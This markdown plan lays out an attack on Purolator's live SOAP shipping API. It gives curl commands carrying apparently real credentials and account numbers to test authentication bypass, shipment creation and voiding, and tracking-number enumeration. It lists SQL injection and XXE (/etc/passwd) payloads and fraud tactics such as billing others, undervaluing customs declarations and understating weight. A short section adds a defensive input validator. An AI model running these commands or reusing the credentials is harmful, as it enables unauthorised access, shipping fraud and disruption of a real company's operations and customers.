# Purolator SOAP API - Precise Attack Surface

## ✅ Confirmed API Operations

### Shipping Service (4 operations)
**Endpoint:** `https://webservices.purolator.com/EWS/v2/Shipping/ShippingService.asmx`

1. **CreateShipment** - Create actual shipments with labels
2. **VoidShipment** - Cancel existing shipments
3. **ValidateShipment** - Validate shipment data before creating
4. **Consolidate** - Consolidate multiple shipments

### Estimating Service (2 operations)
**Endpoint:** `https://webservices.purolator.com/EWS/v2/Estimating/EstimatingService.asmx`

1. **GetQuickEstimate** - Fast rate quotes
2. **GetFullEstimate** - Detailed estimates (captured in use)

---

## 🎯 Precise Test Plan

### Phase 1: Authentication Bypass Test (CRITICAL)

**Goal:** Determine if AWS Signature is actually required

```bash
# Test 1: GetQuickEstimate WITHOUT credentials
curl -X POST https://webservices.purolator.com/EWS/v2/Estimating/EstimatingService.asmx \
  -H "Content-Type: text/xml; charset=utf-8" \
  -H "SOAPAction: http://purolator.com/pws/service/v2/GetQuickEstimate" \
  -d @quick_estimate.xml

# Expected: 401 Unauthorized

# Test 2: GetQuickEstimate WITH Basic Auth only (no AWS sig)
curl -X POST https://webservices.purolator.com/EWS/v2/Estimating/EstimatingService.asmx \
  -H "Authorization: Basic MDAwYjk0ZDY2MDFmNGM5NmJhNzVkODQ0MzMxN2EyYTk6eHlBfUZXb0Q=" \
  -H "Content-Type: text/xml; charset=utf-8" \
  -H "SOAPAction: http://purolator.com/pws/service/v2/GetQuickEstimate" \
  -d @quick_estimate.xml

# Expected: AWS error (good) OR success (CRITICAL vulnerability)
```

**quick_estimate.xml:**
```xml
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" 
               xmlns:v2="http://purolator.com/pws/datatypes/v2">
  <soap:Header>
    <v2:RequestContext>
      <v2:Version>2.0</v2:Version>
      <v2:Language>en</v2:Language>
      <v2:GroupID/>
      <v2:RequestReference>Test</v2:RequestReference>
    </v2:RequestContext>
  </soap:Header>
  <soap:Body>
    <v2:GetQuickEstimateRequest>
      <v2:BillingAccountNumber>000b94d6601f4c96ba75d8443317a2a9</v2:BillingAccountNumber>
      <v2:SenderPostalCode>M5H2N2</v2:SenderPostalCode>
      <v2:ReceiverAddress>
        <v2:City>Hamilton</v2:City>
        <v2:Province>ON</v2:Province>
        <v2:Country>CA</v2:Country>
        <v2:PostalCode>L8S4L8</v2:PostalCode>
      </v2:ReceiverAddress>
      <v2:PackageType>Package</v2:PackageType>
      <v2:TotalWeight>
        <v2:Value>5</v2:Value>
        <v2:WeightUnit>lb</v2:WeightUnit>
      </v2:TotalWeight>
    </v2:GetQuickEstimateRequest>
  </soap:Body>
</soap:Envelope>
```

---

### Phase 2: Privilege Escalation Test

**Goal:** Test whether the Account credential has more access than the Credit Card credential

```bash
# Test with Credit Card credential
curl -u "000b94d6601f4c96ba75d8443317a2a9:xyA}FWoD" \
  -X POST https://webservices.purolator.com/EWS/v2/Shipping/ShippingService.asmx \
  -H "Content-Type: text/xml; charset=utf-8" \
  -H "SOAPAction: http://purolator.com/pws/service/v2/ValidateShipment" \
  -d @validate_shipment.xml

# Test with Account credential  
curl -u "ef7475ef70b44f4687158fbbb9ff3f47:|HXY2).6" \
  -X POST https://webservices.purolator.com/EWS/v2/Shipping/ShippingService.asmx \
  -H "Content-Type: text/xml; charset=utf-8" \
  -H "SOAPAction: http://purolator.com/pws/service/v2/ValidateShipment" \
  -d @validate_shipment.xml

# Compare responses - different permissions?
```

**validate_shipment.xml:**
```xml
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" 
               xmlns:v2="http://purolator.com/pws/datatypes/v2">
  <soap:Header>
    <v2:RequestContext>
      <v2:Version>2.0</v2:Version>
      <v2:Language>en</v2:Language>
      <v2:GroupID/>
      <v2:RequestReference>ValidationTest</v2:RequestReference>
    </v2:RequestContext>
  </soap:Header>
  <soap:Body>
    <v2:ValidateShipmentRequest>
      <v2:Shipment>
        <v2:SenderInformation>
          <v2:Address>
            <v2:Name>Test Sender</v2:Name>
            <v2:StreetNumber>123</v2:StreetNumber>
            <v2:StreetName>Main</v2:StreetName>
            <v2:City>Toronto</v2:City>
            <v2:Province>ON</v2:Province>
            <v2:Country>CA</v2:Country>
            <v2:PostalCode>M5H2N2</v2:PostalCode>
            <v2:PhoneNumber>
              <v2:CountryCode>1</v2:CountryCode>
              <v2:AreaCode>416</v2:AreaCode>
              <v2:Phone>5551234</v2:Phone>
            </v2:PhoneNumber>
          </v2:Address>
        </v2:SenderInformation>
        <v2:ReceiverInformation>
          <v2:Address>
            <v2:Name>Test Receiver</v2:Name>
            <v2:StreetNumber>456</v2:StreetNumber>
            <v2:StreetName>King</v2:StreetName>
            <v2:City>Hamilton</v2:City>
            <v2:Province>ON</v2:Province>
            <v2:Country>CA</v2:Country>
            <v2:PostalCode>L8S4L8</v2:PostalCode>
            <v2:PhoneNumber>
              <v2:CountryCode>1</v2:CountryCode>
              <v2:AreaCode>905</v2:AreaCode>
              <v2:Phone>5555678</v2:Phone>
            </v2:PhoneNumber>
          </v2:Address>
        </v2:ReceiverInformation>
        <v2:PackageInformation>
          <v2:ServiceID>PurolatorExpress</v2:ServiceID>
          <v2:TotalWeight>
            <v2:Value>5</v2:Value>
            <v2:WeightUnit>lb</v2:WeightUnit>
          </v2:TotalWeight>
          <v2:TotalPieces>1</v2:TotalPieces>
        </v2:PackageInformation>
        <v2:PaymentInformation>
          <v2:PaymentType>Sender</v2:PaymentType>
          <v2:RegisteredAccountNumber>000b94d6601f4c96ba75d8443317a2a9</v2:RegisteredAccountNumber>
        </v2:PaymentInformation>
        <v2:PickupInformation>
          <v2:PickupType>DropOff</v2:PickupType>
        </v2:PickupInformation>
      </v2:Shipment>
    </v2:ValidateShipmentRequest>
  </soap:Body>
</soap:Envelope>
```

---

### Phase 3: CreateShipment Test (HIGH RISK)

**Goal:** Test if you can create ACTUAL shipments

**⚠️ WARNING:** This could create real shipments billed to the corporate account!

```bash
# DRY RUN: Use ValidateShipment first
curl -u "000b94d6601f4c96ba75d8443317a2a9:xyA}FWoD" \
  -X POST https://webservices.purolator.com/EWS/v2/Shipping/ShippingService.asmx \
  -H "Content-Type: text/xml; charset=utf-8" \
  -H "SOAPAction: http://purolator.com/pws/service/v2/ValidateShipment" \
  -d @validate_shipment.xml

# If validation succeeds, you COULD create real shipment:
# curl -u "..." CreateShipment ...
# DO NOT RUN unless you want real labels generated!
```

**Impact if successful:**
- Generate valid shipping labels
- Create shipments billed to corporate account
- Obtain tracking numbers
- Financial fraud potential

---

### Phase 4: VoidShipment Test

**Goal:** Test if you can cancel shipments

**Requirements:**
1. A valid PIN (tracking number) is needed
2. Test whether shipments you did not create can be voided

```bash
# Try to void a known shipment PIN
curl -u "000b94d6601f4c96ba75d8443317a2a9:xyA}FWoD" \
  -X POST https://webservices.purolator.com/EWS/v2/Shipping/ShippingService.asmx \
  -H "Content-Type: text/xml; charset=utf-8" \
  -H "SOAPAction: http://purolator.com/pws/service/v2/VoidShipment" \
  -d @void_shipment.xml
```

**void_shipment.xml:**
```xml
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" 
               xmlns:v2="http://purolator.com/pws/datatypes/v2">
  <soap:Header>
    <v2:RequestContext>
      <v2:Version>2.0</v2:Version>
      <v2:Language>en</v2:Language>
      <v2:GroupID/>
      <v2:RequestReference>VoidTest</v2:RequestReference>
    </v2:RequestContext>
  </soap:Header>
  <soap:Body>
    <v2:VoidShipmentRequest>
      <v2:PIN>
        <v2:Value>520127751300</v2:Value>
      </v2:PIN>
    </v2:VoidShipmentRequest>
  </soap:Body>
</soap:Envelope>
```

**Risk:** Can you disrupt operations by voiding legitimate shipments?

---

### Phase 5: Data Enumeration Test

**Goal:** Test for insecure direct object reference (IDOR)

**5.1 Sequential PIN Testing:**
```bash
# Try sequential tracking numbers
for i in {520127751300..520127751310}; do
  echo "Testing PIN: $i"
  curl -u "..." VoidShipment -d "<PIN>$i</PIN>" | grep -i "error\|success"
done
```

**5.2 Rate Structure Mining:**
```bash
# Query all postal code combinations
for from_postal in M5H2N2 M5J2N8 M5K1B2; do
  for to_postal in L8S4L8 L8N3Y1 L8P4R1; do
    echo "Testing: $from_postal -> $to_postal"
    curl -u "..." GetQuickEstimate ...
  done
done
```

**Impact:**
- Map complete rate structure
- Discover corporate shipping patterns
- Competitive intelligence

---

### Phase 6: Input Validation Fuzzing

**Goal:** Find injection vulnerabilities

**6.1 SQL Injection Test:**
```xml
<v2:BillingAccountNumber>000b94d6601f4c96ba75d8443317a2a9' OR '1'='1</v2:BillingAccountNumber>
<v2:PostalCode>M5H2N2'; DROP TABLE shipments;--</v2:PostalCode>
```

**6.2 XML Injection Test:**
```xml
<v2:Name>Test<![CDATA[]]></v2:Name>
<v2:Name>&lt;script&gt;alert(1)&lt;/script&gt;</v2:Name>
```

**6.3 XXE (XML External Entity) Test:**
```xml
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<v2:Name>&xxe;</v2:Name>
```

**6.4 Boundary Value Testing:**
```xml
<v2:Value>-999999</v2:Value>  <!-- Negative weight -->
<v2:Value>999999999</v2:Value>  <!-- Huge weight -->
<v2:TotalPieces>0</v2:TotalPieces>  <!-- Zero pieces -->
<v2:TotalPieces>999999</v2:TotalPieces>  <!-- Massive pieces -->
```

---

### Phase 7: Business Logic Abuse

**7.1 Free Shipping Test:**
```xml
<v2:PaymentType>Receiver</v2:PaymentType>
<!-- Try to bill someone else without authorization -->
```

**7.2 International Smuggling:**
```xml
<v2:ContentDetail>
  <v2:Description>Harmless Item</v2:Description>
  <v2:HarmonizedCode>9999999</v2:HarmonizedCode>  <!-- Invalid code -->
  <v2:UnitValue>0.01</v2:UnitValue>  <!-- Undervalue -->
</v2:ContentDetail>
```

**7.3 Rate Arbitrage:**
```xml
<!-- Declare low weight, ship heavy -->
<v2:TotalWeight><v2:Value>1</v2:Value></v2:TotalWeight>
<!-- vs actual 50 lbs -->
```
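Server-side counterpart to 6.3, 6.4 and 7.1, as an added example that is not part of this plan or of Purolator's code: a validator for the `ValidateShipmentRequest` envelope shown in Phase 2. It refuses any document carrying a DTD before parsing, bounds weight and piece counts, and checks that the account to be charged is the caller's own (PaymentType `Sender`) or is on the caller's authorization list (PaymentType `Receiver`). `MAX_WEIGHT_LB`, `MAX_PIECES`, the `ACCT-*` placeholders and the authorization lookup are assumptions; the element names are those of the envelopes above.

```python
import re
import xml.etree.ElementTree as ET

NS = {"soap": "http://schemas.xmlsoap.org/soap/envelope/",
      "v2": "http://purolator.com/pws/datatypes/v2"}
CA_POSTAL = re.compile(r"^[A-Z]\d[A-Z]\d[A-Z]\d$")  # Canadian postal code without the space
MAX_WEIGHT_LB = 150.0   # policy ceiling assumed for this example, not a carrier figure
MAX_PIECES = 99         # policy ceiling assumed for this example


class RequestRejected(ValueError):
    """Raised for any request the endpoint should refuse before doing work."""


def parse_envelope(xml_bytes):
    # 6.3 mitigation: a document carrying a DTD is refused before the parser sees it,
    # so no entity (external or internal) can ever be declared. Scanning raw bytes
    # rather than trusting parser flags also catches a DOCTYPE placed after the prolog.
    lowered = xml_bytes.lower()
    if b"<!doctype" in lowered or b"<!entity" in lowered:
        raise RequestRejected("DTD and entity declarations are not accepted")
    try:
        return ET.fromstring(xml_bytes)
    except ET.ParseError as exc:
        raise RequestRejected(f"malformed XML: {exc}") from None


def text(node, path):
    el = node.find(path, NS)
    return el.text.strip() if el is not None and el.text else None


def check_postal(value, label):
    if value is None or not CA_POSTAL.match(value):
        raise RequestRejected(f"{label}: postal code {value!r} is not valid")
    return value


def check_number(value, label, low, high):
    # 6.4 mitigation: parse strictly and bound both ends. float("nan") and
    # float("inf") parse but fail the range test, so they are rejected as well.
    try:
        number = float(value)
    except (TypeError, ValueError):
        raise RequestRejected(f"{label}: {value!r} is not a number") from None
    if not low <= number <= high:
        raise RequestRejected(f"{label}: {number} is outside [{low}, {high}]")
    return number


def authorize_billing(caller, payment_type, billed, authorized):
    # 7.1 mitigation: the account to be charged is checked against the caller's
    # identity and an explicit authorization list, never trusted from the body.
    if payment_type == "Sender":
        allowed = billed == caller
    elif payment_type == "Receiver":
        allowed = billed in authorized
    else:
        raise RequestRejected(f"PaymentType {payment_type!r} is not accepted")
    if not allowed:
        raise RequestRejected(f"caller {caller!r} may not bill account {billed!r}")


def validate_shipment(xml_bytes, caller, authorized=frozenset()):
    """Return the checked fields of a ValidateShipmentRequest or raise RequestRejected."""
    ship = parse_envelope(xml_bytes).find("soap:Body/v2:ValidateShipmentRequest/v2:Shipment", NS)
    if ship is None:
        raise RequestRejected("body has no ValidateShipmentRequest/Shipment")
    pkg = "v2:PackageInformation/"
    unit = text(ship, pkg + "v2:TotalWeight/v2:WeightUnit")
    if unit != "lb":  # only the unit used in this plan is accepted by the example
        raise RequestRejected(f"WeightUnit {unit!r} is not accepted")
    weight = check_number(text(ship, pkg + "v2:TotalWeight/v2:Value"), "TotalWeight", 0.1, MAX_WEIGHT_LB)
    pieces = check_number(text(ship, pkg + "v2:TotalPieces"), "TotalPieces", 1, MAX_PIECES)
    if pieces != int(pieces):
        raise RequestRejected("TotalPieces must be a whole number")
    pay = "v2:PaymentInformation/"
    billed = text(ship, pay + "v2:RegisteredAccountNumber")
    authorize_billing(caller, text(ship, pay + "v2:PaymentType"), billed, authorized)
    return {
        "from": check_postal(text(ship, "v2:SenderInformation/v2:Address/v2:PostalCode"), "sender"),
        "to": check_postal(text(ship, "v2:ReceiverInformation/v2:Address/v2:PostalCode"), "receiver"),
        "weight": weight, "unit": unit, "pieces": int(pieces), "billed": billed,
    }


def shipment_envelope(weight="5", pieces="1", payment="Sender", billed="ACCT-CALLER", prolog=""):
    """Constructed envelope using the element names of the plan above; ACCT-CALLER and
    ACCT-OTHER are placeholder account numbers, not real ones."""
    return (prolog + '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"'
            ' xmlns:v2="http://purolator.com/pws/datatypes/v2"><soap:Body>'
            '<v2:ValidateShipmentRequest><v2:Shipment>'
            '<v2:SenderInformation><v2:Address><v2:PostalCode>M5H2N2</v2:PostalCode>'
            '</v2:Address></v2:SenderInformation>'
            '<v2:ReceiverInformation><v2:Address><v2:PostalCode>L8S4L8</v2:PostalCode>'
            '</v2:Address></v2:ReceiverInformation>'
            f'<v2:PackageInformation><v2:TotalWeight><v2:Value>{weight}</v2:Value>'
            f'<v2:WeightUnit>lb</v2:WeightUnit></v2:TotalWeight><v2:TotalPieces>{pieces}'
            '</v2:TotalPieces></v2:PackageInformation>'
            f'<v2:PaymentInformation><v2:PaymentType>{payment}</v2:PaymentType>'
            f'<v2:RegisteredAccountNumber>{billed}</v2:RegisteredAccountNumber>'
            '</v2:PaymentInformation></v2:Shipment></v2:ValidateShipmentRequest>'
            '</soap:Body></soap:Envelope>').encode()


def outcome(xml_bytes, caller="ACCT-CALLER", authorized=frozenset()):
    """('ok', fields) or ('rejected', reason), so callers never see an exception."""
    try:
        return "ok", validate_shipment(xml_bytes, caller, authorized)
    except RequestRejected as exc:
        return "rejected", str(exc)


if __name__ == "__main__":
    print(outcome(shipment_envelope()))
    print(outcome(shipment_envelope(weight="-999999")))
    print(outcome(shipment_envelope(prolog='<!DOCTYPE foo [<!ENTITY x "y">]>')))
    print(outcome(shipment_envelope(payment="Receiver", billed="ACCT-OTHER")))
```

The baseline envelope passes; the 6.4 values (`-999999`, `999999999`, `0`, `999999`) are all rejected at the bounds check, a DTD is rejected before parsing regardless of what it declares, and a `Receiver` payment against an account not on the caller's list is refused until that account is added to `authorized`.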

---

## 🎪 Expected Vulnerabilities (Ranked by Severity)

### CRITICAL (9.0-10.0)
1. **Unauthenticated API Access**
   - **Test:** Phase 1
   - **If:** Basic Auth alone works (no AWS sig)
   - **Impact:** Complete unauthorized access to shipping platform

2. **Unauthorized Shipment Creation**
   - **Test:** Phase 3
   - **If:** CreateShipment succeeds
   - **Impact:** Financial fraud, generate valid labels, ship packages on corporate account

3. **IDOR - Access Other Shipments**
   - **Test:** Phase 5.1
   - **If:** Can void/query shipments not created by you
   - **Impact:** Data leakage, service disruption

### HIGH (7.0-8.9)
4. **Business Logic - Free Shipping**
   - **Test:** Phase 7.1
   - **If:** Can bill receiver without authorization
   - **Impact:** Financial abuse

5. **Rate Structure Extraction**
   - **Test:** Phase 5.2
   - **If:** Unlimited queries allowed
   - **Impact:** Competitive intelligence, pricing leakage

6. **Input Validation - SQL Injection**
   - **Test:** Phase 6.1
   - **If:** SQL errors or unauthorized data returned
   - **Impact:** Database compromise

### MEDIUM (4.0-6.9)
7. **XXE / XML Injection**
   - **Test:** Phase 6.3
   - **If:** External entities processed
   - **Impact:** File disclosure, SSRF

8. **Boundary Value Bugs**
   - **Test:** Phase 6.4
   - **If:** Crashes, errors, or unexpected behavior
   - **Impact:** DoS, data corruption

---

## ⚡ Quick Win Commands

**Test 1 - Does Basic Auth work?**
```bash
# --fail makes curl exit non-zero on an HTTP 4xx/5xx; without it a 401 still
# exits 0 and the && branch below would report success
curl -sS --fail -u "000b94d6601f4c96ba75d8443317a2a9:xyA}FWoD" \
  "https://webservices.purolator.com/EWS/v2/Estimating/EstimatingService.asmx?WSDL" \
  > /dev/null && echo "✅ Auth works" || echo "❌ Auth failed"
```

**Test 2 - Can you validate shipments?**
```bash
curl -u "000b94d6601f4c96ba75d8443317a2a9:xyA}FWoD" \
  -X POST https://webservices.purolator.com/EWS/v2/Shipping/ShippingService.asmx \
  -H "Content-Type: text/xml; charset=utf-8" \
  -H "SOAPAction: http://purolator.com/pws/service/v2/ValidateShipment" \
  -d @validate_shipment.xml \
  | grep -q "ValidShipment.*true" && echo "✅ Can create shipments!" || echo "❌ Blocked"
```

---

## 📊 Impact Summary

| Vulnerability | Likelihood | Impact | Risk |
|--------------|-----------|---------|------|
| No AWS Sig Required | HIGH | CRITICAL | **CRITICAL** |
| Unauthorized CreateShipment | MEDIUM | CRITICAL | **HIGH** |
| IDOR on Shipments | MEDIUM | HIGH | **HIGH** |
| Rate Mining | HIGH | MEDIUM | **MEDIUM** |
| SQL Injection | LOW | HIGH | **MEDIUM** |
| XXE | LOW | MEDIUM | **LOW** |

---

## 🎯 Recommended Testing Order

1. **Start Safe:** Phase 1 (auth test) - read-only
2. **Validate Access:** Phase 2 (privilege test) - read-only
3. **Test Boundaries:** Phase 6.4 (boundary values) - low risk
4. **⚠️ STOP HERE FOR RESPONSIBLE DISCLOSURE**
5. **DO NOT:** Phase 3 (CreateShipment) - could create real shipments!
6. **DO NOT:** Phase 4 (VoidShipment) - could disrupt operations!

---

## 📝 Documentation Checklist

For each test, record:
- [ ] Request (full curl command)
- [ ] Response (HTTP status + body)
- [ ] Error messages
- [ ] Timing (response time)
- [ ] Any credentials/tokens returned
- [ ] Screenshot/video if GUI involved

**Save everything to:**
- `test_results/phase1_auth_test.txt`
- `test_results/phase2_privilege_test.txt`
- etc.
